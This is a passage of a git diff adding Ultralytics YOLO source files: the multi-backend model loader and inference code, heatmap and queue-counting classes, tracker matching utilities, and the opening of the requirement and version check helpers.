runtime.deserialize_cuda_engine(f.read()) # read engine + + # Model context + try: + context = model.create_execution_context() + except Exception as e: # model is None + LOGGER.error(f"ERROR: TensorRT model exported with a different version than {trt.__version__}\n") + raise e + + bindings = OrderedDict() + output_names = [] + fp16 = False # default updated below + dynamic = False + is_trt10 = not hasattr(model, "num_bindings") + num = range(model.num_io_tensors) if is_trt10 else range(model.num_bindings) + for i in num: + if is_trt10: + name = model.get_tensor_name(i) + dtype = trt.nptype(model.get_tensor_dtype(name)) + is_input = model.get_tensor_mode(name) == trt.TensorIOMode.INPUT + 
if is_input: + if -1 in tuple(model.get_tensor_shape(name)): + dynamic = True + context.set_input_shape(name, tuple(model.get_tensor_profile_shape(name, 0)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_tensor_shape(name)) + else: # TensorRT < 10.0 + name = model.get_binding_name(i) + dtype = trt.nptype(model.get_binding_dtype(i)) + is_input = model.binding_is_input(i) + if model.binding_is_input(i): + if -1 in tuple(model.get_binding_shape(i)): # dynamic + dynamic = True + context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_binding_shape(i)) + im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device) + bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr())) + binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items()) + batch_size = bindings["images"].shape[0] # if dynamic, this is instead max batch size + + # CoreML + elif coreml: + LOGGER.info(f"Loading {w} for CoreML inference...") + import coremltools as ct + + model = ct.models.MLModel(w) + metadata = dict(model.user_defined_metadata) + + # TF SavedModel + elif saved_model: + LOGGER.info(f"Loading {w} for TensorFlow SavedModel inference...") + import tensorflow as tf + + keras = False # assume TF1 saved_model + model = tf.keras.models.load_model(w) if keras else tf.saved_model.load(w) + metadata = Path(w) / "metadata.yaml" + + # TF GraphDef + elif pb: # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt + LOGGER.info(f"Loading {w} for TensorFlow GraphDef inference...") + import tensorflow as tf + + from ultralytics.engine.exporter import gd_outputs + + def wrap_frozen_graph(gd, inputs, outputs): + """Wrap frozen graphs for deployment.""" + x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), []) # wrapped + ge = x.graph.as_graph_element + return 
x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs)) + + gd = tf.Graph().as_graph_def() # TF GraphDef + with open(w, "rb") as f: + gd.ParseFromString(f.read()) + frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd)) + try: # find metadata in SavedModel alongside GraphDef + metadata = next(Path(w).resolve().parent.rglob(f"{Path(w).stem}_saved_model*/metadata.yaml")) + except StopIteration: + pass + + # TFLite or TFLite Edge TPU + elif tflite or edgetpu: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python + try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu + from tflite_runtime.interpreter import Interpreter, load_delegate + except ImportError: + import tensorflow as tf + + Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate + if edgetpu: # TF Edge TPU https://coral.ai/software/#edgetpu-runtime + device = device[3:] if str(device).startswith("tpu") else ":0" + LOGGER.info(f"Loading {w} on device {device[1:]} for TensorFlow Lite Edge TPU inference...") + delegate = {"Linux": "libedgetpu.so.1", "Darwin": "libedgetpu.1.dylib", "Windows": "edgetpu.dll"}[ + platform.system() + ] + interpreter = Interpreter( + model_path=w, + experimental_delegates=[load_delegate(delegate, options={"device": device})], + ) + device = "cpu" # Required, otherwise PyTorch will try to use the wrong device + else: # TFLite + LOGGER.info(f"Loading {w} for TensorFlow Lite inference...") + interpreter = Interpreter(model_path=w) # load TFLite model + interpreter.allocate_tensors() # allocate + input_details = interpreter.get_input_details() # inputs + output_details = interpreter.get_output_details() # outputs + # Load metadata + try: + with zipfile.ZipFile(w, "r") as model: + meta_file = model.namelist()[0] + metadata = ast.literal_eval(model.read(meta_file).decode("utf-8")) + except zipfile.BadZipFile: + pass + + # TF.js + elif tfjs: + raise 
NotImplementedError("YOLOv8 TF.js inference is not currently supported.") + + # PaddlePaddle + elif paddle: + LOGGER.info(f"Loading {w} for PaddlePaddle inference...") + check_requirements("paddlepaddle-gpu" if cuda else "paddlepaddle") + import paddle.inference as pdi # noqa + + w = Path(w) + if not w.is_file(): # if not *.pdmodel + w = next(w.rglob("*.pdmodel")) # get *.pdmodel file from *_paddle_model dir + config = pdi.Config(str(w), str(w.with_suffix(".pdiparams"))) + if cuda: + config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0) + predictor = pdi.create_predictor(config) + input_handle = predictor.get_input_handle(predictor.get_input_names()[0]) + output_names = predictor.get_output_names() + metadata = w.parents[1] / "metadata.yaml" + + # MNN + elif mnn: + LOGGER.info(f"Loading {w} for MNN inference...") + check_requirements("MNN") # requires MNN + import os + + import MNN + + config = {} + config["precision"] = "low" + config["backend"] = "CPU" + config["numThread"] = (os.cpu_count() + 1) // 2 + rt = MNN.nn.create_runtime_manager((config,)) + net = MNN.nn.load_module_from_file(w, [], [], runtime_manager=rt, rearrange=True) + + def torch_to_mnn(x): + return MNN.expr.const(x.data_ptr(), x.shape) + + metadata = json.loads(net.get_info()["bizCode"]) + + # NCNN + elif ncnn: + LOGGER.info(f"Loading {w} for NCNN inference...") + check_requirements("git+https://github.com/Tencent/ncnn.git" if ARM64 else "ncnn") # requires NCNN + import ncnn as pyncnn + + net = pyncnn.Net() + net.opt.use_vulkan_compute = cuda + w = Path(w) + if not w.is_file(): # if not *.param + w = next(w.glob("*.param")) # get *.param file from *_ncnn_model dir + net.load_param(str(w)) + net.load_model(str(w.with_suffix(".bin"))) + metadata = w.parent / "metadata.yaml" + + # NVIDIA Triton Inference Server + elif triton: + check_requirements("tritonclient[all]") + from ultralytics.utils.triton import TritonRemoteModel + + model = TritonRemoteModel(w) + + # Any other format 
(unsupported) + else: + from ultralytics.engine.exporter import export_formats + + raise TypeError( + f"model='{w}' is not a supported model format. Ultralytics supports: {export_formats()['Format']}\n" + f"See https://docs.ultralytics.com/modes/predict for help." + ) + + # Load external metadata YAML + if isinstance(metadata, (str, Path)) and Path(metadata).exists(): + metadata = yaml_load(metadata) + if metadata and isinstance(metadata, dict): + for k, v in metadata.items(): + if k in {"stride", "batch"}: + metadata[k] = int(v) + elif k in {"imgsz", "names", "kpt_shape"} and isinstance(v, str): + metadata[k] = eval(v) + stride = metadata["stride"] + task = metadata["task"] + batch = metadata["batch"] + imgsz = metadata["imgsz"] + names = metadata["names"] + kpt_shape = metadata.get("kpt_shape") + elif not (pt or triton or nn_module): + LOGGER.warning(f"WARNING ⚠️ Metadata not found for 'model={weights}'") + + # Check names + if "names" not in locals(): # names missing + names = default_class_names(data) + names = check_class_names(names) + + # Disable gradients + if pt: + for p in model.parameters(): + p.requires_grad = False + + self.__dict__.update(locals()) # assign all variables to self + + def forward(self, im, augment=False, visualize=False, embed=None): + """ + Runs inference on the YOLOv8 MultiBackend model. + + Args: + im (torch.Tensor): The image tensor to perform inference on. + augment (bool): whether to perform data augmentation during inference, defaults to False + visualize (bool): whether to visualize the output predictions, defaults to False + embed (list, optional): A list of feature vectors/embeddings to return. 
+ + Returns: + (tuple): Tuple containing the raw output tensor, and processed output for visualization (if visualize=True) + """ + b, ch, h, w = im.shape # batch, channel, height, width + if self.fp16 and im.dtype != torch.float16: + im = im.half() # to FP16 + if self.nhwc: + im = im.permute(0, 2, 3, 1) # torch BCHW to numpy BHWC shape(1,320,192,3) + + # PyTorch + if self.pt or self.nn_module: + y = self.model(im, augment=augment, visualize=visualize, embed=embed) + + # TorchScript + elif self.jit: + y = self.model(im) + + # ONNX OpenCV DNN + elif self.dnn: + im = im.cpu().numpy() # torch to numpy + self.net.setInput(im) + y = self.net.forward() + + # ONNX Runtime + elif self.onnx or self.imx: + if self.dynamic: + im = im.cpu().numpy() # torch to numpy + y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im}) + else: + if not self.cuda: + im = im.cpu() + self.io.bind_input( + name="images", + device_type=im.device.type, + device_id=im.device.index if im.device.type == "cuda" else 0, + element_type=np.float16 if self.fp16 else np.float32, + shape=tuple(im.shape), + buffer_ptr=im.data_ptr(), + ) + self.session.run_with_iobinding(self.io) + y = self.bindings + if self.imx: + # boxes, conf, cls + y = np.concatenate([y[0], y[1][:, :, None], y[2][:, :, None]], axis=-1) + + # OpenVINO + elif self.xml: + im = im.cpu().numpy() # FP32 + + if self.inference_mode in {"THROUGHPUT", "CUMULATIVE_THROUGHPUT"}: # optimized for larger batch-sizes + n = im.shape[0] # number of images in batch + results = [None] * n # preallocate list with None to match the number of images + + def callback(request, userdata): + """Places result in preallocated list using userdata index.""" + results[userdata] = request.results + + # Create AsyncInferQueue, set the callback and start asynchronous inference for each input image + async_queue = self.ov.runtime.AsyncInferQueue(self.ov_compiled_model) + async_queue.set_callback(callback) + for i in range(n): + # Start async 
inference with userdata=i to specify the position in results list + async_queue.start_async(inputs={self.input_name: im[i : i + 1]}, userdata=i) # keep image as BCHW + async_queue.wait_all() # wait for all inference requests to complete + y = np.concatenate([list(r.values())[0] for r in results]) + + else: # inference_mode = "LATENCY", optimized for fastest first result at batch-size 1 + y = list(self.ov_compiled_model(im).values()) + + # TensorRT + elif self.engine: + if self.dynamic and im.shape != self.bindings["images"].shape: + if self.is_trt10: + self.context.set_input_shape("images", im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + self.bindings[name].data.resize_(tuple(self.context.get_tensor_shape(name))) + else: + i = self.model.get_binding_index("images") + self.context.set_binding_shape(i, im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + i = self.model.get_binding_index(name) + self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i))) + + s = self.bindings["images"].shape + assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}" + self.binding_addrs["images"] = int(im.data_ptr()) + self.context.execute_v2(list(self.binding_addrs.values())) + y = [self.bindings[x].data for x in sorted(self.output_names)] + + # CoreML + elif self.coreml: + im = im[0].cpu().numpy() + im_pil = Image.fromarray((im * 255).astype("uint8")) + # im = im.resize((192, 320), Image.BILINEAR) + y = self.model.predict({"image": im_pil}) # coordinates are xywh normalized + if "confidence" in y: + raise TypeError( + "Ultralytics only supports inference of non-pipelined CoreML models exported with " + f"'nms=False', but 'model={w}' has an NMS pipeline created by an 'nms=True' export." 
+ ) + # TODO: CoreML NMS inference handling + # from ultralytics.utils.ops import xywh2xyxy + # box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels + # conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float32) + # y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1) + elif len(y) == 1: # classification model + y = list(y.values()) + elif len(y) == 2: # segmentation model + y = list(reversed(y.values())) # reversed for segmentation models (pred, proto) + + # PaddlePaddle + elif self.paddle: + im = im.cpu().numpy().astype(np.float32) + self.input_handle.copy_from_cpu(im) + self.predictor.run() + y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names] + + # MNN + elif self.mnn: + input_var = self.torch_to_mnn(im) + output_var = self.net.onForward([input_var]) + y = [x.read() for x in output_var] + + # NCNN + elif self.ncnn: + mat_in = self.pyncnn.Mat(im[0].cpu().numpy()) + with self.net.create_extractor() as ex: + ex.input(self.net.input_names()[0], mat_in) + # WARNING: 'output_names' sorted as a temporary fix for https://github.com/pnnx/pnnx/issues/130 + y = [np.array(ex.extract(x)[1])[None] for x in sorted(self.net.output_names())] + + # NVIDIA Triton Inference Server + elif self.triton: + im = im.cpu().numpy() # torch to numpy + y = self.model(im) + + # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU) + else: + im = im.cpu().numpy() + if self.saved_model: # SavedModel + y = self.model(im, training=False) if self.keras else self.model(im) + if not isinstance(y, list): + y = [y] + elif self.pb: # GraphDef + y = self.frozen_func(x=self.tf.constant(im)) + else: # Lite or Edge TPU + details = self.input_details[0] + is_int = details["dtype"] in {np.int8, np.int16} # is TFLite quantized int8 or int16 model + if is_int: + scale, zero_point = details["quantization"] + im = (im / scale + zero_point).astype(details["dtype"]) # de-scale + self.interpreter.set_tensor(details["index"], im) + 
def from_numpy(self, x):
    """
    Move a NumPy array onto the backend device as a tensor.

    Args:
        x (np.ndarray): Array to convert. Any object that is not a NumPy array is passed through untouched.

    Returns:
        (torch.Tensor): A tensor copy of `x` placed on `self.device`, or `x` itself when it is not a NumPy array.
    """
    if not isinstance(x, np.ndarray):
        return x  # nothing to convert (e.g. already a tensor)
    return torch.tensor(x).to(self.device)
class Heatmap(ObjectCounter):
    """
    A class to draw heatmaps in real-time video streams based on object tracks.

    This class extends the ObjectCounter class to generate and visualize heatmaps of object movements in video
    streams. It uses tracked object positions to create a cumulative heatmap effect over time.

    Attributes:
        initialized (bool): Flag indicating whether the heatmap array has been allocated.
        colormap (int): OpenCV colormap used for heatmap visualization.
        heatmap (np.ndarray): float32 array, shaped like the first processed frame, storing cumulative heat.
        annotator (Annotator): Object for drawing annotations on the image, recreated for every frame.

    Methods:
        heatmap_effect: Adds heat inside a circle inscribed in a bounding box.
        generate_heatmap: Processes one frame and returns it blended with the colorized heatmap.

    Examples:
        >>> import cv2
        >>> from ultralytics.solutions import Heatmap
        >>> heatmap = Heatmap(model="yolo11n.pt", colormap=cv2.COLORMAP_JET)
        >>> frame = cv2.imread("frame.jpg")
        >>> processed_frame = heatmap.generate_heatmap(frame)
    """

    def __init__(self, **kwargs):
        """Initializes the Heatmap class for real-time video stream heatmap generation based on object tracks."""
        super().__init__(**kwargs)

        self.initialized = False  # the heatmap array is allocated lazily on the first frame
        if self.region is not None:  # check if user provided the region coordinates
            self.initialize_region()

        # Store colormap, falling back to PARULA when none is configured
        self.colormap = cv2.COLORMAP_PARULA if self.CFG["colormap"] is None else self.CFG["colormap"]

    def heatmap_effect(self, box):
        """
        Add heat to the circular area inscribed in a bounding box.

        The circle is centered on the box center with a radius of half the shorter box side. Boxes that extend
        beyond the heatmap are clipped to its bounds so that the region slice and the distance mask always have
        the same shape; boxes lying completely outside the heatmap are ignored.

        Args:
            box (List[float]): Bounding box coordinates [x0, y0, x1, y1].

        Examples:
            >>> heatmap = Heatmap()
            >>> box = [100, 100, 200, 200]
            >>> heatmap.heatmap_effect(box)
        """
        x0, y0, x1, y1 = map(int, box)

        # Circle geometry is derived from the full (unclipped) box
        radius_squared = (min(x1 - x0, y1 - y0) // 2) ** 2
        center_x, center_y = (x0 + x1) // 2, (y0 + y1) // 2

        # Clip the region of interest (ROI) to the heatmap; a negative start or an end past the edge would
        # otherwise produce a slice whose shape differs from the mask and raise an IndexError
        height, width = self.heatmap.shape[:2]
        x0, x1 = max(x0, 0), min(x1, width)
        y0, y1 = max(y0, 0), min(y1, height)
        if x0 >= x1 or y0 >= y1:
            return  # empty ROI, nothing to update

        # Create a meshgrid over the ROI for vectorized distance calculations
        xv, yv = np.meshgrid(np.arange(x0, x1), np.arange(y0, y1))

        # Mask of points within the radius of the box center
        within_radius = (xv - center_x) ** 2 + (yv - center_y) ** 2 <= radius_squared

        # Update only the values inside the circle in a single vectorized operation
        self.heatmap[y0:y1, x0:x1][within_radius] += 2

    def generate_heatmap(self, im0):
        """
        Generate heatmap for each frame using Ultralytics.

        Args:
            im0 (np.ndarray): Input image array for processing.

        Returns:
            (np.ndarray): Processed image with heatmap overlay and object counts (if region is specified).

        Examples:
            >>> heatmap = Heatmap()
            >>> im0 = cv2.imread("image.jpg")
            >>> result = heatmap.generate_heatmap(im0)
        """
        if not self.initialized:
            self.heatmap = np.zeros_like(im0, dtype=np.float32)  # all-zero accumulator shaped like the frame
            self.initialized = True  # Initialize heatmap only once

        self.annotator = Annotator(im0, line_width=self.line_width)  # Initialize annotator
        self.extract_tracks(im0)  # Extract tracks

        # Iterate over bounding boxes, track ids and classes index
        for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss):
            # Accumulate heat for this detection
            self.heatmap_effect(box)

            if self.region is not None:
                self.annotator.draw_region(reg_pts=self.region, color=(104, 0, 123), thickness=self.line_width * 2)
                self.store_tracking_history(track_id, box)  # Store track history
                self.store_classwise_counts(cls)  # store classwise counts in dict
                current_centroid = ((box[0] + box[2]) / 2, (box[1] + box[3]) / 2)
                # Previous position is the second-to-last history entry, when one exists
                prev_position = None
                if len(self.track_history[track_id]) > 1:
                    prev_position = self.track_history[track_id][-2]
                self.count_objects(current_centroid, track_id, prev_position, cls)  # Perform object counting

        if self.region is not None:
            self.display_counts(im0)  # Display the counts on the frame

        # Normalize, apply colormap to heatmap and combine with original image
        if self.track_data.id is not None:
            im0 = cv2.addWeighted(
                im0,
                0.5,
                cv2.applyColorMap(
                    cv2.normalize(self.heatmap, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8), self.colormap
                ),
                0.5,
                0,
            )

        self.display_output(im0)  # display output with base class function
        return im0  # return output image for more usage
class QueueManager(BaseSolution):
    """
    Counts tracked objects that are inside a queue region, frame by frame.

    The class builds on BaseSolution, which supplies the tracking helpers used here (`initialize_region`,
    `extract_tracks`, `store_tracking_history`, `display_output`) and the tracking state they maintain.

    Attributes:
        counts (int): Number of objects counted inside the region for the current frame.
        rect_color (Tuple[int, int, int]): Color tuple used to draw the queue region.
        region_length (int): Number of points defining the queue region.
        annotator (Annotator): Drawing helper, recreated for every processed frame.

    Methods:
        process_queue: Processes a single frame and returns it annotated with the queue count.

    Examples:
        >>> queue_manager = QueueManager(region=[(20, 400), (1080, 400), (1080, 360), (20, 360)])
        >>> for frame in video_stream:
        ...     processed_frame = queue_manager.process_queue(frame)
        ...     cv2.imshow("Queue Management", processed_frame)
    """

    def __init__(self, **kwargs):
        """Sets up the queue region and the per-frame counting state."""
        super().__init__(**kwargs)
        self.initialize_region()
        self.counts = 0  # objects currently inside the region
        self.rect_color = (255, 255, 255)  # region outline color
        self.region_length = len(self.region)  # cached number of region points

    def process_queue(self, im0):
        """
        Annotate one frame and count the tracked objects inside the queue region.

        The count is reset for every frame. An object contributes to the count when the region has at least
        three points, the object has a previous position in its track history, and the latest point of its track
        line lies inside the region.

        Args:
            im0 (numpy.ndarray): Input image for processing, typically a frame from a video stream.

        Returns:
            (numpy.ndarray): The same image, annotated with the region, boxes, tracks and the queue count.

        Examples:
            >>> queue_manager = QueueManager()
            >>> frame = cv2.imread("frame.jpg")
            >>> processed_frame = queue_manager.process_queue(frame)
        """
        self.counts = 0  # start every frame from zero
        self.annotator = Annotator(im0, line_width=self.line_width)
        self.extract_tracks(im0)

        # Outline the queue region
        region_thickness = self.line_width * 2
        self.annotator.draw_region(reg_pts=self.region, color=self.rect_color, thickness=region_thickness)

        for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss):
            # Label the detection and record its position
            self.annotator.box_label(box, label=self.names[cls], color=colors(track_id, True))
            self.store_tracking_history(track_id, box)

            # Draw the centroid and trail of the object
            self.annotator.draw_centroid_and_tracks(
                self.track_line, color=colors(int(track_id), True), track_thickness=self.line_width
            )

            # An object is only counted once it has a previous position in its history
            history = self.track_history.get(track_id, [])
            prev_position = history[-2] if len(history) > 1 else None
            if self.region_length >= 3 and prev_position and self.r_s.contains(self.Point(self.track_line[-1])):
                self.counts += 1

        # Render the queue count next to the region
        self.annotator.queue_counts_display(
            f"Queue Counts : {str(self.counts)}",
            points=self.region,
            region_color=self.rect_color,
            txt_color=(104, 31, 17),
        )
        self.display_output(im0)  # show the frame via the base class helper

        return im0
def linear_assignment(cost_matrix: np.ndarray, thresh: float, use_lap: bool = True) -> tuple:
    """
    Perform linear assignment using either the scipy or lap.lapjv method.

    Args:
        cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M).
        thresh (float): Threshold for considering an assignment valid.
        use_lap (bool): Use lap.lapjv for the assignment. If False, scipy.optimize.linear_sum_assignment is used.

    Returns:
        matches (np.ndarray | list): Matched (row, column) index pairs. An array of shape (K, 2) for an empty
            cost matrix and for the scipy path, a list of [row, column] pairs for the lap path.
        unmatched_a (tuple | np.ndarray | list): Row indices without a valid match, in ascending order.
        unmatched_b (tuple | np.ndarray | list): Column indices without a valid match, in ascending order.

    Examples:
        >>> cost_matrix = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
        >>> thresh = 5.0
        >>> matched_indices, unmatched_a, unmatched_b = linear_assignment(cost_matrix, thresh, use_lap=True)
    """
    if cost_matrix.size == 0:
        return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1]))

    if use_lap:
        # Use lap.lapjv
        # https://github.com/gatagat/lap
        _, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh)
        matches = [[ix, mx] for ix, mx in enumerate(x) if mx >= 0]
        unmatched_a = np.where(x < 0)[0]
        unmatched_b = np.where(y < 0)[0]
    else:
        # Use scipy.optimize.linear_sum_assignment
        # https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.linear_sum_assignment.html
        # Import the submodule explicitly: a bare `import scipy` does not guarantee `scipy.optimize` is loaded
        from scipy.optimize import linear_sum_assignment

        rows, cols = linear_sum_assignment(cost_matrix)  # optimal row/column pairing
        keep = cost_matrix[rows, cols] <= thresh  # discard pairs whose cost exceeds the threshold
        matches = np.stack((rows[keep], cols[keep]), axis=1)  # always shape (K, 2), also when K == 0

        matched_rows = set(matches[:, 0].tolist())
        matched_cols = set(matches[:, 1].tolist())
        unmatched_a = [i for i in range(cost_matrix.shape[0]) if i not in matched_rows]
        unmatched_b = [j for j in range(cost_matrix.shape[1]) if j not in matched_cols]

    return matches, unmatched_a, unmatched_b
def embedding_distance(tracks: list, detections: list, metric: str = "cosine") -> np.ndarray:
    """
    Build a track-to-detection cost matrix from appearance embeddings.

    Args:
        tracks (list[STrack]): Tracks; the `smooth_feat` attribute of each one is used as its embedding.
        detections (list[BaseTrack]): Detections; the `curr_feat` attribute of each one is used as its embedding.
        metric (str): Distance metric name forwarded to `scipy.spatial.distance.cdist`, e.g. 'cosine' or
            'euclidean'.

    Returns:
        (np.ndarray): Cost matrix of shape (N, M) for N tracks and M detections, with negative distances clamped
            to zero. When either list is empty, an all-zero float32 matrix of that shape is returned.

    Examples:
        Compute the embedding distance between tracks and detections using cosine metric
        >>> tracks = [STrack(...), STrack(...)]  # List of track objects with embedding features
        >>> detections = [BaseTrack(...), BaseTrack(...)]  # List of detection objects with embedding features
        >>> cost_matrix = embedding_distance(tracks, detections, metric="cosine")
    """
    n_tracks, n_dets = len(tracks), len(detections)
    if n_tracks == 0 or n_dets == 0:
        return np.zeros((n_tracks, n_dets), dtype=np.float32)  # nothing to compare

    track_features = np.asarray([t.smooth_feat for t in tracks], dtype=np.float32)
    det_features = np.asarray([d.curr_feat for d in detections], dtype=np.float32)

    pairwise = cdist(track_features, det_features, metric)
    return np.maximum(0.0, pairwise)  # clamp tiny negative values produced by rounding
+ + Examples: + Fuse a cost matrix with detection scores + >>> cost_matrix = np.random.rand(5, 10) # 5 tracks and 10 detections + >>> detections = [BaseTrack(score=np.random.rand()) for _ in range(10)] + >>> fused_matrix = fuse_score(cost_matrix, detections) + """ + if cost_matrix.size == 0: + return cost_matrix + iou_sim = 1 - cost_matrix + det_scores = np.array([det.score for det in detections]) + det_scores = np.expand_dims(det_scores, axis=0).repeat(cost_matrix.shape[0], axis=0) + fuse_sim = iou_sim * det_scores + return 1 - fuse_sim # fuse_cost diff --git a/2024.ultralytics/v8.3.40/utils/checks.py b/2024.ultralytics/v8.3.40/utils/checks.py new file mode 100644 index 0000000..3a8201a --- /dev/null +++ b/2024.ultralytics/v8.3.40/utils/checks.py @@ -0,0 +1,776 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import glob +import inspect +import math +import os +import platform +import re +import shutil +import subprocess +import time +from importlib import metadata +from pathlib import Path +from typing import Optional + +import cv2 +import numpy as np +import requests +import torch + +from ultralytics.utils import ( + ASSETS, + AUTOINSTALL, + IS_COLAB, + IS_GIT_DIR, + IS_KAGGLE, + IS_PIP_PACKAGE, + LINUX, + LOGGER, + MACOS, + ONLINE, + PYTHON_VERSION, + ROOT, + TORCHVISION_VERSION, + USER_CONFIG_DIR, + WINDOWS, + Retry, + SimpleNamespace, + ThreadingLocked, + TryExcept, + clean_url, + colorstr, + downloads, + emojis, + is_github_action_running, + url2file, +) + + +def parse_requirements(file_path=ROOT.parent / "requirements.txt", package=""): + """ + Parse a requirements.txt file, ignoring lines that start with '#' and any text after '#'. + + Args: + file_path (Path): Path to the requirements.txt file. + package (str, optional): Python package to use instead of requirements.txt file, i.e. package='ultralytics'. + + Returns: + (List[Dict[str, str]]): List of parsed requirements as dictionaries with `name` and `specifier` keys. 
def check_imgsz(imgsz, stride=32, min_dim=1, max_dim=2, floor=0):
    """
    Verify image size is a multiple of the given stride in each dimension.

    If the image size is not a multiple of the stride, it is rounded up to the next multiple of the stride (and to
    at least `floor`), and a warning is logged.

    Args:
        imgsz (int | List[int] | Tuple[int] | str): Image size. Strings such as '640', '[640,640]' or '640,480'
            are parsed as Python literals.
        stride (int | torch.Tensor): Stride value. For a tensor, its maximum element is used.
        min_dim (int): Minimum number of dimensions.
        max_dim (int): Maximum number of dimensions.
        floor (int): Minimum allowed value for image size.

    Returns:
        (List[int] | int): Updated image size. A single value is returned as a bare int when `min_dim == 1` and is
            duplicated to `[size, size]` when `min_dim == 2`.

    Raises:
        TypeError: If `imgsz` is not an int, list, tuple or str.
        ValueError: If a string `imgsz` cannot be parsed into a number or a list/tuple, or if more than `max_dim`
            values are given while `max_dim != 1`.
    """
    import ast  # local import, only needed to parse string inputs

    # Convert stride to integer if it is a tensor
    stride = int(stride.max() if isinstance(stride, torch.Tensor) else stride)

    # Convert image size to a list
    if isinstance(imgsz, int):
        imgsz = [imgsz]
    elif isinstance(imgsz, (list, tuple)):
        imgsz = list(imgsz)
    elif isinstance(imgsz, str):  # i.e. '640' or '[640,640]'
        if imgsz.isnumeric():
            imgsz = [int(imgsz)]
        else:
            # Strings may come straight from the command line: parse them as literals only, never execute them
            try:
                parsed = ast.literal_eval(imgsz)
            except (ValueError, SyntaxError) as e:
                raise ValueError(
                    f"'imgsz={imgsz}' is not a valid image size. "
                    f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'"
                ) from e
            if isinstance(parsed, (list, tuple)):
                imgsz = list(parsed)  # normalize tuples so the 'was it updated' comparison below is list vs list
            elif isinstance(parsed, (int, float)):
                imgsz = [parsed]
            else:
                raise ValueError(
                    f"'imgsz={imgsz}' is not a valid image size. "
                    f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'"
                )
    else:
        raise TypeError(
            f"'imgsz={imgsz}' is of invalid type {type(imgsz).__name__}. "
            f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'"
        )

    # Apply max_dim
    if len(imgsz) > max_dim:
        msg = (
            "'train' and 'val' imgsz must be an integer, while 'predict' and 'export' imgsz may be a [h, w] list "
            "or an integer, i.e. 'yolo export imgsz=640,480' or 'yolo export imgsz=640'"
        )
        if max_dim != 1:
            raise ValueError(f"imgsz={imgsz} is not a valid image size. {msg}")
        LOGGER.warning(f"WARNING ⚠️ updating to 'imgsz={max(imgsz)}'. {msg}")
        imgsz = [max(imgsz)]

    # Make image size a multiple of the stride (rounding up) and at least `floor`
    sz = [max(math.ceil(x / stride) * stride, floor) for x in imgsz]

    # Print warning message if image size was updated
    if sz != imgsz:
        LOGGER.warning(f"WARNING ⚠️ imgsz={imgsz} must be multiple of max stride {stride}, updating to {sz}")

    # Add missing dimensions if necessary
    sz = [sz[0], sz[0]] if min_dim == 2 and len(sz) == 1 else sz[0] if min_dim == 1 and len(sz) == 1 else sz

    return sz
+ + Example: + ```python + # Check if current version is exactly 22.04 + check_version(current="22.04", required="==22.04") + + # Check if current version is greater than or equal to 22.04 + check_version(current="22.10", required="22.04") # assumes '>=' inequality if none passed + + # Check if current version is less than or equal to 22.04 + check_version(current="22.04", required="<=22.04") + + # Check if current version is between 20.04 (inclusive) and 22.04 (exclusive) + check_version(current="21.10", required=">20.04,<22.04") + ``` + """ + if not current: # if current is '' or None + LOGGER.warning(f"WARNING ⚠️ invalid check_version({current}, {required}) requested, please check values.") + return True + elif not current[0].isdigit(): # current is package name rather than version string, i.e. current='ultralytics' + try: + name = current # assigned package name to 'name' arg + current = metadata.version(current) # get version string from package name + except metadata.PackageNotFoundError as e: + if hard: + raise ModuleNotFoundError(emojis(f"WARNING ⚠️ {current} package is required but not installed")) from e + else: + return False + + if not required: # if required is '' or None + return True + + if "sys_platform" in required and ( # i.e. 
def check_latest_pypi_version(package_name="ultralytics"):
    """
    Look up the latest released version of a package on PyPI without downloading or installing it.

    The lookup is best-effort: any error while contacting PyPI or reading the response yields None.

    Args:
        package_name (str): The name of the package to find the latest version for.

    Returns:
        (str | None): The latest version string, or None if the request did not return status 200 or failed.
    """
    try:
        requests.packages.urllib3.disable_warnings()  # Disable the InsecureRequestWarning
        reply = requests.get(f"https://pypi.org/pypi/{package_name}/json", timeout=3)
        if reply.status_code != 200:
            return None  # PyPI answered, but not with the package metadata
        return reply.json()["info"]["version"]
    except Exception:
        return None  # network failure or unexpected payload: treat the version as unknown
@ThreadingLocked()
def check_font(font="Arial.ttf"):
    """
    Locate a font file, downloading it into the user configuration directory as a last resort.

    The lookup order is: a file with the same name in USER_CONFIG_DIR, then the first system font whose path
